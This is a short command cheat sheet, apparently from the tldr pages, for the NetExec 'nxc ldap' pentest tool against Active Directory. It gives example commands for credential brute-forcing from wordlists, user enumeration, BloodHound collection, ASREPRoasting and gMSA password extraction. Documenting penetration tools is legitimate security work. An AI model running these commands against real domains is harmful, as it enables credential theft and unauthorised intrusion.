nxc ldap
Pentest and exploit Windows Active Directory Domains via LDAP. More information: https://www.netexec.wiki/ldap-protocol.
- Search for valid domain credentials by trying out every combination in the specified lists of [u]sernames and [p]asswords:
nxc ldap {{}} -u {{path/to/usernames.txt}} -p {{path/to/passwords.txt}}
- Enumerate active domain users:
nxc ldap {{}} -u {{username}} -p {{password}} --active-users
- Collect data about the targeted domain and automatically import these data into BloodHound:
nxc ldap {{}} -u {{username}} -p {{password}} --bloodhound --collection {{All}}
- Attempt to collect AS_REP messages for the specified user in order to perform an ASREPRoasting attack:
nxc ldap {{}} -u {{username}} -p '' --asreproast {{path/to/output.txt}}
- Attempt to extract the passwords of group managed service accounts on the domain:
nxc ldap {{}} -u {{username}} -p {{password}} --gmsa